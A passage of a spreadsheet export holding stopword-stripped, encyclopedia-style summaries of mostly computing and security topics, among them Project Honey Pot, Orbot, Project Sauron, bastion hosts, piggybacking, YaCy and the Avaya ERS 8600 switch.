passed provided echa fees paid time. examination dossier examination dossier carried risk assessment committee (rac) socio-economic analysis committee (seac) opens public consultation alternatives. during weeks, companies, ngos interested party possibility comment possibly challenge alternatives proposed applicant. consultation followed additional discussions committees order clarify application. this process called trialogue stakeholders invited participate.duration examination varies according complexity clarity dossier. committees however obligation deliver first opinion dossier months submission latest. dossier committee's opinion sent commission. whole process take years. implementation feedback 2015, applications authorisation filed total uses. specific strategy every each dossier requires implementing specific strategy, define uses, analysis industrial processes associated risks, alternatives, socio-economic impacts banning substance. committees expect dossier contain precise description industrial process operational conditions representative dossier well risk management measures implemented applicantthe main issue application authorisation process duration review period granted. therefore critical bring necessary precisions dossiers justify requested review period duration. justification weak argumentation generic induce granting shorter-than-requested review period. in-depth analysis companies’ activity beyond simple drafting application authorisation dossier, whole process implies expertise deep analysis company's activity, multiple aspects: technical aspects(chemical safety report, analysis alternatives), business aspects (supply chain security, public consultation) strategic aspects (anticipating development growth activity within years timeframe).this analysis therefore requires extensive collection information also, possibly, contacts customers strengthen analysis alternatives. public consultation heart decision public consultation core mechanisms authorisation process. stakeholders’ (competing companies, universities, laboratories, ngos, member states, etc.) involvement consultation process growing last years reach comments single dossier) influence comments, particular concerning alternatives, makes major step authorisation process. order streamline process, templates comments instructions available echa website. consulting costs consulting costs application authorisation estimated echa amounts, average, around 230,000 single use. notes references references external links "echa website: information chemicals".</t>
  </si>
  <si>
    <t>Project Honey Pot</t>
  </si>
  <si>
    <t>project honey web-based honeypot network operated unspam technologies, inc. uses software embedded sites. collects information addresses used harvesting e-mail addresses spam, bulk mailing, e-mail fraud. project solicits donation unused entries domain owners. 2007, project began number initiatives including quicklinks program makes easier people participate, well system track comment spam. project also launched free service called http:bl, leverages data allow website administrators keep malicious robots sites. addition collecting information, made available "top list periodic intervals, project organizers also help various enforcement agencies combat private commercial unsolicited bulk mailing offenses and, overall, work reduce amount spam sent received internet. information collected also used research development newer versions software improve efforts group whole. references external links official website official unspam technologies, inc. site</t>
  </si>
  <si>
    <t>Orbot</t>
  </si>
  <si>
    <t>orbot free software proxy server project provide anonymity internet users android operating system. acts instance network devices allows traffic routing device's browser, email client, program, etc., network, providing anonymity user.this tool used keep communications users anonymized hidden governments third parties might monitoring internet traffic. reception 2014 orbot discussed detail article "reporting securely android device".in july 2021, tech radar named orbot "best privacy apps android 2021" warned slower speeds.in july 2021 android authority discussed browser orbot brief reviews best android browsers". references further reading hathaway, april 2010). "orbot offers anonymous browsing android, tor". switched.com. archived original september 2013. retrieved july 2012.</t>
  </si>
  <si>
    <t>Project Sauron</t>
  </si>
  <si>
    <t>project sauron, also named remsec computer malware discovered 2016. spying computers government organizations five years. steal encryption keys, collect information air-gapped computers, record someone’s keystrokes without detected. also flame (malware) duqu stuxnet references</t>
  </si>
  <si>
    <t>Organisation-based access control</t>
  </si>
  <si>
    <t>computer security, organization-based access control (orbac) access control model first presented 2003. current approaches access control rest three entities (subject, action, object) control access policy specifies subject permission realize action object. orbac allows policy designer define security policy independently implementation. chosen method fulfill goal introduction abstract level. subjects abstracted roles. role subjects security rule apply. similarly, activity actions security rule apply. and, view objects security rule apply. each security policy defined organization. thus, specification security policy completely parameterized organization possible handle simultaneously several security policies associated different organizations. model restricted permissions, also includes possibility specify prohibitions obligations. from three abstract entities (roles, activities, views), abstract privileges defined. abstract privileges, concrete privileges derived. orbac context sensitive, policy could expressed dynamically. furthermore, orbac owns concepts hierarchy (organization, role, activity, view, context) separation constraints. also external links orbac site motorbac site (orbac simulation conflict detection tool)</t>
  </si>
  <si>
    <t>Organizational Systems Security Analyst</t>
  </si>
  <si>
    <t>organizational systems security analyst (ossa) technical vendor-neutral information security certification programme offered asia. developed thinksecure ltd, information-security certification body consultancy. programme consists specialized technical information security training certification course practical examination technical information technology professionals attend order become skilled effective technical information security professionals prove level competence skill undergoing examination. technical staff enrolling programme taught trained address technical security issues encounter daily operations methodically establish, operate maintain security organization's computer network computer systems infrastructure. ossa programme focus hackers' software quickly become obsolete software patches released. first looks security methodological thinking perspective draws lessons tzu's "the war" generate security framework introduces example resources tools various security aims objectives, "how defend server hacker's attacks" met. tzu's 'art war' treatise used provide guiding philosophy throughout programme, addressing offensive threats defensive measures needed overcome them. philosophy also extends sections incident response methodology (i.e. respond security breaches), computer forensics impact security-related activities recovery information computer crime suspect's hard drive. under programme, students given coursework experience maintain complete enterprise-class security monitoring defence infrastructure includes firewalls, network intrusion detection systems, file-integrity checkers, honeypots encryption. unique attacker's methodology also introduced assist technical staff identifying modus operandi attacker arsenal conduct auditing computer systems using methodology. generic title sections programme appear comprise following: what information security network defending turf security policy formulation defensive tools lockdown attacker methodology: attacker methods exploits wireless (in)security incident response computer forensics impact lawunder section many modules, example defensive section covers setting firewalls, nids, hids, honeypots, cryptographic software, etc. ossa programme consists practical hands-on lab-based coursework practical hands-on lab-based certification examination. according thinksecure website, rationale prove apply skills knowledge completely unknown exam setup certified know exam-cramming memorizing facts figures visiting brain dump sites able certified. compared non-practical multiple-choice-question exam formats, method examination beneficial information security industry employers whole provides following benefits: makes sure candidates prove ability apply skills practical examination certified. stops brain-dumpers attaining devaluing certification basis competency evaluation. protects people's companies' money time investment getting certified. helps employers identify technical staff skilled. provides industry pool competent, qualified technical staff. external links organizational systems security analyst (ossa) definition ossa acronym ossa programme outline thinksecure association information security professionals list certifications</t>
  </si>
  <si>
    <t>Visible Embryo Project</t>
  </si>
  <si>
    <t>visible embryo project (vep) multi-institutional, multidisciplinary research project originally created early 1990s collaboration developmental anatomy center national museum health medicine biomedical visualization laboratory (bvl) university illinois chicago, develop software strategies development distributed biostructural databases using cutting-edge technologies high-performance computing communications (hpcc), implement tools creation large-scale digital archive multidimensional data normal abnormal human development." this project related bvl's research areas health informatics, educational multimedia, biomedical imaging science. over following decades, list collaborators grew include dozen universities, national laboratories, companies around world. early (1993) goal project enable called "spatial genomics," create tools systems three-dimensional morphological mapping gene expression, correlate data human genome project multidimensional location genomic expression activity within morphological context organisms. this invention late 1990s collaborators first system spatial transcriptomics. other areas researchers pioneered include early technologies, cloud computing, blockchain, virtual assistant technology. early history created 1992 collaboration biomedical visualization laboratory, directed michael doyle, human developmental anatomy center national museum health medicine (nmhm), directed adrianne noe. doyle appointed oversight committee visible human project national library medicine, would several years data would become available. looking sources high-resolution volume data human anatomical structure, came across carnegie collection human embryology, housed nmhm. during sabbatical working methods magnetic resonance microscopy (mrm) laboratory paul lauterbur, 2003 nobel laureate, doyle created plan worked recruit large group prominent researchers join initial collaborators. primary goal project provide testbed development technologies, refinement existing ones, application high-speed, high-performance computing communications current problems biomedical science. data much early work involved creating serial section reconstructions microscope slides, extracting volumetric data nmhm specimens, rather surface data. sets serial microscopic cross-sections human embryos (prepared carnegie collection contributors 1890s 1970s) used sample image data around design implement various components system. these images digitized processed create voxel datasets representing embryonic anatomy. standard techniques volume visualization could applied data. image processing data required correct certain artifacts found original microscope sections routine histological techniques tissue preparation. later activities project would make datasets acquired nmhm collection, ultra-high resolution histology images, three-dimensional adult image data acquired visible human project, addition embryo data. collaborations became far-reaching collaborative research program involving large number eminent scientists across nation around world, including, among many others, michael doyle, uic, ucsf, project founder, adrianne noe, director national museum health medicine, george washington university's robert ledley, inventor full-body scanner, uiuc's paul lauterbur, pioneer nobel laureate, lsu's gasser, eminent embryologist, oregon health science university's kent thornburg, internationally renown developmental biologist, regan moore, director dice group diego supercomputer center, william lennon lawrence livermore national laboratory, ingrid carlbom digital equipment corporation's cambridge research lab, demetri terzopoulos university toronto. some notable visible embryo project collaborations include: muritechin mid-1990s, michael doyle collaborated harvard's betsey williams create internet atlas mouse development, project named "muritech." prototype two- three-dimensional color atlas mouse development developed, using embryos, 13.5 normal mouse embryo patch mutant embryo age. serial sections embryos, external registration marker system, introduced paraffin embedding process, prepared standard histological methods. atlas, color images digitized consecutive sections normal embryo. atlas, gray scale images digitized mutant embryo conformally warped reconstructed volume dataset. external fiducial system facilitated three-dimensional reconstruction providing accurate registration consecutive images also allowed precise spatial calibration correction warping artifacts. atlases, associated anatomical knowledge base, integrated multimedia on-line information resource vep's technology provide research biologists advanced tools analyze normal abnormal murine embryonic development. next generation internet contractthe human embryology digital library collaboratory support tools project begun 1999 demonstration biomedical application potential next generation internet (ngi). collaborators included eight organizations sites around continental usa, medical information technology organizations, including george mason university, eolas, armed forces institute pathology, johns hopkins university, lawrence livermore national laboratory,the oregon health science university, diego supercomputer center, university illinois chicago. project undertook three major applications, based carnegie collection embryos afip's national museum health medicine human development anatomy center (hdac), collection cellular-level tissue slides world's largest repositories human embryos. these applications included: digitization, curation annotation embryo data: team created production digitization capability, using automated digital microscopy, data automatically registered tiling transmitted repository diego supercomputer center, annotated teams biomedical volunteers expert-level quality control. distributed embryology education using materials derived carnegie collection create animations embryo development recorded master classes streamed internet downloaded create portable electronic classroom. clinical management planning medical professionals expectant parent patients review normal abnormal development patterns collaborative consultation distant experts. anatlabin order enable ways interactively explore vep's massive volume datasets, michael doyle created zmap system, using visible human project image data first prototype. 2011, doyle collaborated steven landers, maurice pescitelli, others zmap create interactive tool allows user select desired sets anatomical structures automated generation quicktime visualizations. system used resources available eolas anatlab knowledgebase, 2200 structures identified involving total 4600 sections 700,000 annotations overall, access anatomical structure surface information individual structures. this surface information used automatically extract contained volumetric image data convert data format compatible osirix volume imaging system. automated scripts controlled osirix creation visualization group selected anatomical structures. photorealistic results obtained using original color voxel information original visible human cryosection images color surface reconstruction. system automatically progressed pre-defined rotations generate image frames required create quicktime (qtvr) interactive movie. this system thereby allowed anatomy instructor quickly easily generate customized interactive reconstructions classroom. technologies over decades since begun, work done visible embryo project development several important technology breakthroughs worldwide impact: spatial transcriptomicseven though spatial mapping omics data described initial goal vep, 1999 four collaborators, michael doyle, george michaels, maurice pescitelli betsey williams worked together create system called "spatial genomics." today, technology known spatial transcriptomics. 2001 u.s. patent application states, system solved need gather gene expression data manner supports type exploratory research take advantage broad-spectrum types biologic activity analysis enabled today's microarray tools," well need "technology allow collection large volumes types data, enable exploratory investigations patterns biologic activity correlate gene expression data morphological structure useful easy understand manner, volume visualization environment allow collection larger volumes gene expression data across wider spectrum gene types ever before." they named system saga, short spatial analysis genomic activity. described related u.s. patents, 7,613,571, 7,894,997 10,011,864, saga system enabled multidimensional morphological reconstruction tissue biologic activity "makes possible biological tissue specimens imaged multiple dimensions allow morphological reconstruction. tissue specimen physically sampled regular raster array, tissue samples taken regular multidimensional matrix pattern across dimensions tissue specimen. each sample isolated coded later correlated specific multidimensional raster array coordinates, thereby providing correlation sample's original pre-sampling morphological location tissue specimen. each tissue sample analyzed broad-spectrum biological activity methods, providing information multitude biologic functional characteristics [mrna, etc.] sample. resultant raster-based biological characteristic data spatially mapped original multidimensional morphological matrix image data. various types analysis performed resultant correlated multidimensional spatial datasets." spatial transcriptomics named "method year 2020" nature, january 2021. cloudin 1993, doyle became director ucsf center knowledge management (ckm). create underlying software hardware would provide needed computational power vep, doyle's group designed paradigm performing remote client-server volume visualization internet. this involved creating system remotely computing visualizations networked cluster, cloud, distributed heterogeneous computational engines, coordinating computations pass user interface control messages engines, causing cloud computers generate rendered visualizations stream resulting views users' desktops, delta-encoding compressing streamed data optimize performance low-bandwidth connections.to hide complexity system user, modified earliest versions ncsa mosaic browser allow interactive cloud-computing applications automatically launched embedded within pages, user would need load document vep, would able immediately interactively explore project's multidimensional datasets, rather static representations datasets.in november 1993, ckm's research group demonstrated system, first web-based cloud application platform, on-stage meeting approximately area sigweb members xerox parc.today, capability called "the cloud." team's work opened door potential provide rich information resources users, regardless located, spawned multi-trillion dollar industry result. zmapdr. doyle began focus directly problem navigate within complex biomedical volume datasets, developed system mapping semantic identity morphological structures within datasets integrating mappings hypermedia linking mechanism web. this creation first three-dimensional image system, used create variety online interactive reference systems biomedical education research throughout beyond. blockchainone challenges large collaborative knowledge bases assure integrity data long period time. standard cryptographic methods depend upon trusting central validation authority vulnerable variety factors lead data corruption, including hacking, data breaches, insider fraud, possible disappearance validating authority itself. order solve problem data collections, doyle created novel type cryptographic system, called transient-key cryptography. this system allows validation data integrity without requiring users system trust central authority, also represented first forward-signature-blockchain system, enabling later creation bitcoin system. mid-2000s, technology adopted national standard ansi x9.95 standard trusted timestamps. virtual assistantssince 2000s, team made great digital voice text communications systems, facilitate communications among geographically-distributed team members. order increase efficiency communications, michael doyle steve landers collaborated create skybot system, first ai-based mobile virtual assistant system. skybot used power flexibility dramatically expand usefulness messaging systems. using skybot, could create variety programmable responses incoming calls chat messages. system incorporated state machine could configured automatically trigger automated responses various communication user-context events. this provided user surprisingly-broad powerful capabilities automating mobile communication operations, pioneered mobile intelligent-assistant product category ubiquitous worldwide. current status plans underway secure funding necessary expand visible embryo project create national resource combines large-scale knowledgebase advanced analytical tools innovative online collaborative environment support continue advance science spatial omics. also visible human project spatial transcriptomics transient-key cryptography blockchain virtual assistant references external links home page visible embryo project 2000-2004 nih/nlm next generation internet contract, hosted george mason university pre-proposal white paper follow-on project visible embryo project 2000-2004 nih/nlm next generation internet contract</t>
  </si>
  <si>
    <t>Organizational unit (computing)</t>
  </si>
  <si>
    <t>computing, organizational unit (ou) provides classifying objects located directories, names digital certificate hierarchy, typically used either differentiate objects name (john "marketing" versus john "customer service"), parcel authority create manage objects (for example: give rights user-creation local technicians instead manage accounts single central group). organizational units commonly appear x.500 directories, x.509 certificates, lightweight directory access protocol (ldap) directories, active directory (ad), lotus notes directories certificate trees, feature almost modern directory digital certificate container grouping system. systems, organizational units appear within top-level organization grouping organization certificate, called domain. many systems also exist within another when nested, contains another creates relationship contained called child container called parent. thus, used create hierarchy containers within domain. only within domain relationships. name different domains independent. specific uses name organizational unit appears represent single organization multiple units (departments) within organization. however, always follow model. they might represent geographical regions, job-functions, associations (external) groups, technology used relation objects. examples would include: department (e.g. human resources) within corporation division (e.g. lifescan, inc.) owned separate parent corporation (johnson johnson), although would commonly placed separate domain association (e.g. contractors) external organization. identify geographically distinct regions (e.g. kansas city) x.521 standard recommends "locality" entry instead. types functions (e.g. managers, storage servers) runs across divisions company represented "organizational role" entry. enterprise directory server active directory java system directory server microsoft active directory (ad), organizational unit (ou) contain unit, including ous, users, groups, computers. organizational units separate domains identical names independent other. administrator group computers users apply common policy them. organizational units give hierarchical structure, properly designed ease administration. origins x.500, novell, lotus software novell lotus supplied largest software directory systems. each companies started flat account directory structures, encountered support name-conflict limitations inherent flat structures. they adopted x.500 concept next-generation software around 1993 novell release novell directory services (subsequently known edirectory), lotus release third version lotus notes. microsoft allegedly used novell's directory blueprint first released versions claim appears suspect, given x.500 served "granddaddy" directory systems. references</t>
  </si>
  <si>
    <t>Piggybacking (security)</t>
  </si>
  <si>
    <t>security, piggybacking, similar tailgating, refers person tags along another person authorized gain entry restricted area, pass certain checkpoint. either electronic physical. legal illegal, authorized unauthorized, depending circumstances. however, term often connotation illegal unauthorized act.to describe unauthorized person follows someone restricted area without consent authorized person, term tailgating also used. "tailgating" implies consent (similar tailgating another vehicle road), "piggybacking" usually implies consent authorized person.piggybacking came public's attention particularly 1999, series weaknesses exposed airport security. study showed majority undercover agents attempting pass checkpoints, bring banned items planes, board planes without tickets, successful. piggybacking revealed methods used order enter off-limits areas. methods electronic user fails properly computer, allowing unauthorized user "piggyback" authorized user's session. physical piggybackers various methods breaching security. these include: surreptitiously following individual authorized enter location, giving appearance legitimately escorted joining large crowd authorized enter, pretending member crowd largely unchecked finding authorized person either disregards rules facility, tricked believing piggybacker authorized, agreeably allows piggybacker alongpiggybacking regarded simpler forms social engineering. also gate crashing references</t>
  </si>
  <si>
    <t>Orthotube</t>
  </si>
  <si>
    <t>orthotube capsule-like high security interlocking door allowing entry building office authorised person time. orthotubes typically used security intelligence agencies, australian security intelligence organisation united kingdom security service control access buildings housing sensitive information. devices appear drama spooks, referred pods. orthotubes manufactured boon edam b.v. netherlands marketed circlelock. references external links boon edam circlelock, high security interlocking door archived 2007-08-08 wayback machine</t>
  </si>
  <si>
    <t>Osiris (software)</t>
  </si>
  <si>
    <t>osiris serverless portal system (usually abbreviated osiris osiris) freeware program used create portals distributed peer-to-peer networking (p2p) autonomous centralized servers. available microsoft windows linux operating systems. unlike common tools used publish information internet, content management systems, internet forums blogs based centralized system, data osiris portal shared (via p2p) participants. because contents necessary navigation replicated every computer, portal used without central server. thus, portal always accessible immune denial service attacks, internet service provider limitations (such traffic shaping censorship) hardware failure. way, portal operated costs free external control. history osiris started developer named "berserker" outgrowth keyforum. osiris written designed decentralized, indestructible expand beyond simple forum. "clodo" joined project several months later. osiris officially announced october 2006 years development. team composed developers (clodo berserker), employees (danielz rei.andrea) group supporters/beta-testers (many already team keyforum). starting version 0.12, osiris become multi-platform, possible migrating visual studio wxwidgets library. features osiris result union peer-to-peer (p2p) technology portals. allows anyone create portal free, without depending anyone needing special technical knowledge. allows create content anonymously, allowing contribute freedom expression speech. osiris offers full-text search engine allows searching across portals' content. resource utilization: increase users portal reduction workload single nodes, work distributed among network nodes. uses infrastructure (based kademlia) portals distribution, field difficult-to-use alternatives. administration based reputations system, manage users distributed system without using central servers. basic concepts osiris differs classic programs focused security distributed data management. security system anonymous. possible make association user address, hence cannot trace person created content. even physical access osiris installation impossible trace actual user without knowing password. 2048-bit digital keys guarantee authenticity content (digitally signed order prevent counterfeiting) confidentiality private messages (encrypted sender recipient). prevent intercepting traffic, connections data transfer portal (called alignment), osiris uses random ports cloaked handshake encrypted point-to-point 256-bit aes. distribution allows content present multiple copies guarantee survival case hardware failure nodes off-line. portals saved locally, read contents even works off-line. reputations system reputations system subsequent generation multiple points view portal innovative aspects program. unlike "traditional" systems computational work (calculation statistics, indexing content, etc.) always made central server, osiris distributed approach, majority works made users portal, distinct points view portal, depending used account. each user free give reputation (positive negative) another user according contribution portal, based reputations, system processes pages removing contents users evaluated negatively (such spammers) importing reputations users considered positively. this allow creation network assessments allows management portal. note client processes data independently machine process called stabilization portal. monarchist anarchists portals when user creates osiris portal, user must choose systems moderation, namely "anarchist" "monarchy". choice cannot changed portal created. anarchic portal, every user rate another user thus influence user's reputation among users portal. way, portal moderated without central server. first reputation always positive administrator, user publishes invitation link (digitally signed) portal. monarchy portal, portal administrator moderators generate reputations, delete promote contents portal. isis gateway isis gateway osiris portals, written possible browse portal without installing osiris. particularity isis management workload data, public server running isis, managed various nodes running osiris. isis forwards requests visitors nodes become available minimizing resources server load-balancing requests. since technically possible guarantee anonymity type architecture, accesses isis read-only. this dual objective ensuring privacy users encourage osiris actively participate portal. future plans version 0.15 available linux windows beta version available. osiris developers considering on-disk data management system called "survival engine". system would automatically delete content needed keep database lightweight improve speed stability portal. optimizations focusing system alignment stabilization make faster less resource-intensive. march 2010, osiris developers announced planning migrate osiris licensed open source software project following months. however, september 2013, source code made available series released. december 2014, osiris developers announced alpha version discussed software design problems. proposed donator/developer osiris create kickstarter funding campaign, software design improvements would require resources. also peer-to-peer hosting forum anonymous freenet syndie references external links official website support forum osiris official forum</t>
  </si>
  <si>
    <t>Bastion host</t>
  </si>
  <si>
    <t>bastion host special-purpose computer network specifically designed configured withstand attacks, named analogy military fortification. computer generally hosts single application process, example, proxy server load balancer, services removed limited reduce threat computer. hardened manner primarily location purpose, either outside firewall inside demilitarized zone (dmz) usually involves access untrusted networks computers. these computers also equipped special networking interfaces withstand high-bandwidth attacks internet. definitions term generally attributed 1990 article discussing firewalls marcus ranum, defined bastion host system identified firewall administrator critical strong point network security. generally, bastion hosts degree extra attention paid security, undergo regular audits, modified software".it also described "any computer fully exposed attack public side dmz, unprotected firewall filtering router. firewalls routers, anything provides perimeter access control security considered bastion hosts. other types bastion hosts include web, mail, dns, servers...due exposure, great deal effort must designing configuring bastion hosts minimize chances penetration." placement there common network configurations include bastion hosts placement. first requires firewalls, bastion hosts sitting first "outside world" firewall, inside firewall, dmz. often, smaller networks multiple firewalls, firewall exists network, bastion hosts commonly placed outside firewall. examples these several examples bastion host systems/services: (domain name system) server email server (file transfer protocol) server honeypot proxy server (virtual private network) server server also jump server references</t>
  </si>
  <si>
    <t>Bounce rate</t>
  </si>
  <si>
    <t>bounce rate internet marketing term used traffic analysis. represents percentage visitors enter site leave ("bounce") rather continuing view pages within site. bounce rate calculated counting number single page visits dividing total visits. represented percentage total visits. bounce rate measure "stickiness." thinking effective website engage visitors deeper website. encouraging visitors continue visit. expressed percentage represents proportion single page visits total visits. bounce rate visits access single page total visits website. purpose bounce rates used help determine effectiveness performance entry page generating interest visitors. entry page bounce rate means page effectively causes visitors view pages continue deeper site.high bounce rates typically indicate website good attracting continued interest visitors. that means visitors view single pages without looking others taking form action within site specified time period. interpretation bounce rate measure relevant website's business objectives definitions conversion, high bounce rate always sign poor performance. sites objective without viewing page, example websites sharing specific knowledge subject (dictionary entry, specific recipe), bounce rate would meaningful determining conversion success. contrast, bounce rate e-commerce site could interpreted correlation purchase conversion rate, providing bounces considered representative visits purchase made. typically, bounce rate e-commerce websites range 45%, performers operating average bounce rate. construction bounce occurs site visitor views single page website, visitor leaves site without visiting pages specified session-timeout occurs. there industry standard minimum maximum time visitor must leave order bounce occur. rather, determined session timeout analytics tracking software. {\displaystyle r_{b}={\frac {t_{v}}{t_{e}}}} bounce rate total number visitors viewing page total entries pagea visitor bounce clicking link page different site closing open window typing clicking "back" button leave site session timeoutthere exceptions: one-page website your offline value proposition compelling people would single webpage information need leave. commonly used session timeout value minutes. case, visitor views page, look another page, leaves browser idle longer minutes, register bounce. visitor continues navigate delay, session occur. bounce rate single page number visitors enter site page leave within specified timeout period without viewing another page, divided total number visitors entered site page. contrast, bounce rate site number site visitors visit single page site session divided total number site visits. caveats while site-wide bounce rate useful metric sites well-defined conversion steps requiring multiple page views, questionable value sites visitors likely find looking entry page. this type behavior common portals referential content sites. example, visitor looking definition particular word enter online dictionary site word's definition page. similarly, visitor wants read specific news story enter news site article written story. these example entry pages could bounce rate (thereby increasing site-wide average), however still considered successful. also exit rate internet marketing landing page landing page optimization analytics conversion rate references</t>
  </si>
  <si>
    <t>YaCy</t>
  </si>
  <si>
    <t>yacy (pronounced see”) free distributed search engine, built principles peer-to-peer (p2p) networks created michael christen 2003. core computer program written java distributed several hundred computers, september 2006, so-called yacy-peers. each yacy-peer independently crawls internet, analyzes indexes found pages, stores indexing results common database (so-called index) shared yacy-peers using principles peer-to-peer. search engine everyone build search portal intranet help search public internet clearly. compared semi-distributed search engines, yacy-network distributed architecture. yacy-peers equal central server exists. either crawling mode local proxy server, indexing pages visited person running yacy computer. several mechanisms provided protect user's privacy. access search functions made locally server provides search enter search terms, returns search results similar format popular search engines. system components yacy search engine based four elements: crawler search robot traverses pages, analyzing content. indexer creates reverse word index (rwi), i.e., word list relevant urls ranking information. words saved form word hashes. search administration interface made interface provided local http servlet servlet engine. data storage used store reverse word index database utilizing distributed hash table. search-engine technology yacy complete search appliance user interface, index, administration monitoring. yacy harvests pages crawler. documents parsed, indexed search index stored locally. peer part peer network, local search index also merged shared index network. search started, local index contributes together global search index peers yacy search network. yacy grid second-generation implementation yacy peer-to-peer search. yacy grid installation consists microservices communicate using master connect program (mcp). yacy parser microservice deployed using docker. when parser component started, searches connects default, local host searched mcp, configure yourself. yacy platform architecture yacy uses combination techniques networking, administration, maintenance indexing search engine, including blacklisting, moderation, communication community. here yacy performs operations: community components forum statistics maintenance server indexing crawler balancer peer-to-peer server communication content organization blacklisting filtering search interface bookmarks monitoring search results distribution yacy available packages linux, windows, macintosh also docker image. yacy also installed operating system either manually compiling using tarball. yacy requires java openjdk recommended. debian package installed repository available subdomain project's website. package maintained official debian package repository yet. also dooble open-source browser integrated yacy search engine tool widget references further reading yacy linuxreviews external links official website</t>
  </si>
  <si>
    <t>Avaya ERS 8600</t>
  </si>
  <si>
    <t>avaya ethernet routing switch 8600 8600, previously known passport 8600 accelar 8000, modular chassis combination hardware router switch used computer networking. system, originally designed manufactured nortel, manufactured avaya 2009 2017. system provided ethernet equipment backbone 2010 winter olympics games, providing service 15,000 voip phones, 40,000 ethernet connections supporting million live spectators. system configurable 1.440 terabit switch cluster using smlt r-smlt protocols, provide high reliability cluster failover (normally less millisecond).there three chassis options; 3-slot chassis commonly used access distribution aggregation switches mtbf 2,043,676hr., 6-slot chassis backbones density high space premium environments, 10-slot chassis high availability high scalability. chassis configured modules normally configured three load balancing power supplies. 2010, software version integrated virtual enterprise network architecture (vena) system, thus expanding capabilities product include network virtualization, cloud computing ieee shortest path bridging (ieee 802.1aq). system provides connectivity ports, using gigabit ethernet, gigabit ethernet, 100/10 megabit ethernet, packet sonet/sdh history 8600 successor nortel's passport (formerly known accelar) 1000-series routing switches. origins rapid city communications, founded april 1996, developed f1200 routing switch 1997. main advantage product others time asics modules allows switching routing packets take place asic chips within module, instead forward central processing unit (cpu). networks june 1997, networks agreed acquire rapid city $155 million stock. networks changed name accelar brand name 1997. f1200 renamed accelar 1200 initially released january 1998. nortel networks when nortel acquired networks 1998, work already begun next-generation routing switch, 8000 series. layer version 8000 series, known accelar 8100 edge switch, premiered june 1999. april 2000, accelar brand name retired product renamed passport 8100. 2000, passport 8600 routing switch released.in 2001, nortel introduced first gigabit ethernet switch modules convention vegas.in 2004, nortel retired passport brand name renamed passport 8600 ethernet routing switch 8600 8600). avaya december 2009, 8600 sold avaya part enterprise business unit divestiture. december 2011 system completed evaluation certification u.s. joint interoperability test command (jitc) testing center united states department defense assured services local area network (aslan). october 2015 announced avaya would stop manufacturing selling 8600 platform 2016. references further reading knapp, james (2001). nortel networks: complete reference (second ed.). mcgraw-hill. 143-173, 235–329, 1120–1104, 1122–1124. isbn 0-07-219281-x. edwards, james (january 2002). nortel networks: beginner's guide. mcgraw-hill. isbn 978-0-07-219430-2. nortel ethernet routing switch solutions (first ed.). research triangle park, nortel press. october 2008. 540. isbn 978-0-9815218-1-7. bates, regis zeecil kimmel (october 2000). nortel networks layer switching. networking series. pennsylvania: mcgraw-hill. 378. isbn 978-0-07-212426-2. retrieved july 2013. tolly group engineers (february 2007). "ethernet routing switches, 5500, 1600, 8300, 8600 report 207171" (pdf). tolly enterprises, llc. archived original (pdf) july 2011. retrieved august 2011. {{cite journal}}: cite journal requires |journal= (help) tolly group engineers (june 2005). "ethernet routing switch 8600 ethernet routing switch 5520/5530 report 205116" (pdf). tolly enterprises, llc. retrieved august 2011. {{cite journal}}: cite journal requires |journal= (help) tolly group engineers (october 2003). "passport 8600 routing switch layer layer interoperability evaluation report 203137". tolly enterprises, llc. archived original october 2011. retrieved august 2011. {{cite journal}}: cite journal requires |journal= (help) tolly group engineers (august 2002). "nortel networks passport 8600 baystack 470-48t layer layer interoperability evaluation report 202142". tolly enterprises, llc. archived original october 2011. retrieved august 2011. {{cite journal}}: cite journal requires |journal= (help) external links "official avaya ethernet routing switch 8600 product page". avaya. retrieved july 2011. "avaya ethernet routing switch 8600 brochures" (pdf). avaya. retrieved july 2011. "official avaya data products page". avaya. retrieved july 2011. "official avaya ethernet routing switch documentation". avaya. retrieved july 2011.</t>
  </si>
  <si>
    <t>Canadian Trusted Computer Product Evaluation Criteria</t>
  </si>
  <si>
    <t>canadian trusted computer product evaluation criteria (ctcpec) computer security standard published 1993 communications security establishment provide evaluation criterion products. combination tcsec (also called orange book) european itsec approaches. ctcpec creation common criteria standard.the canadian system security centre, part communications security establishment founded 1988 establish canadian computer security standard. centre published draft standard april 1992. final version published january 1993. references external links mate bacic, (january 1991). "the canadian trusted computer product evaluation criteria (ctcpec)". proceedings sixth annual conference: computer security applications conference. ieee: 188–196. doi:10.1109/csac.1990.143768. isbn 978-0-8186-2105-5. s2cid 195839905.</t>
  </si>
  <si>
    <t>Avatar (computing)</t>
  </si>
  <si>
    <t>computing, avatar graphical representation user user's character persona. avatars two-dimensional icons internet forums online communities, also known profile pictures, userpics, formerly picons (personal icons). alternatively, avatar take form three-dimensional model, used online worlds video games. term avatāra originates sanskrit, adopted early computer games science fiction novelists. richard garriott extended term on-screen user representation 1985, term gained wider adoption internet forums muds. nowadays, avatars used variety online settings including social media, virtual assistants, instant messaging platforms, digital worlds world warcraft second life. they take form image one's real-life self, often seen platforms like facebook, virtual character diverges real world. often, customised show support different causes, create unique online representation. academic research focused avatars influence outcomes communication digital identity. users employ avatars fictional characteristics gain social acceptance ease social interaction. however, studies found majority users choose avatars resemble real-world selves. fact, term avatar, introduced financial trading sergio alvarez-teleña (phd), doctoral thesis, states traders "avatar calibration" introducing management strategy, includes agents mimic financial policy. term called "avatar calibration" precisely agents resemble reasoning trader within specific environments derived combination parameters. origins word avatar ultimately derived sanskrit word (avatāra hinduism, stands "descent" deity terrestrial form. first used computer game 1979 plato role-playing game avatar. norman spinrad's novel songs stars (1980), term avatar used description computer generated virtual experience. story, humans receive messages alien galactic network wishes share knowledge experience advanced civilizations "songs". humans build "galactic receiver" allows users engage "artificial realities". experience described such: stand throng multifleshed being, mind avatared matter, broad avenue winding city blue trees bright foliage living buildings growing soil multitude forms. term avatar on-screen representation user coined 1985 richard garriott computer game ultima quest avatar. game, garriott desired player's character earth self manifested virtual world. ethical content story, garriott wanted real player responsible character; thought someone playing "themselves" could properly judged based in-game actions. because ethically-nuanced narrative approach, took hindu word associated deity's manifestation earth physical form, applied player game world. other early uses term include lucasfilm chip morningstar's 1986 online role-playing game habitat, 1989 paper role-playing game shadowrun.the avatar mean online virtual bodies popularised neal stephenson 1992 cyberpunk novel snow crash. snow crash, term avatar used describe virtual simulation human form metaverse, fictional virtual-reality application internet. social status within metaverse often based quality user's avatar, highly detailed avatar showed user skilled hacker programmer less talented would off-the-shelf models manner beginner would today. stephenson wrote "acknowledgments" snow crash: idea "virtual reality" metaverse widespread computer-graphics community used number different ways. particular vision metaverse expressed novel originated idle discussion jaime (captain bandwidth) taaffe words avatar sense used here) metaverse inventions, came decided existing words (such virtual reality) simply 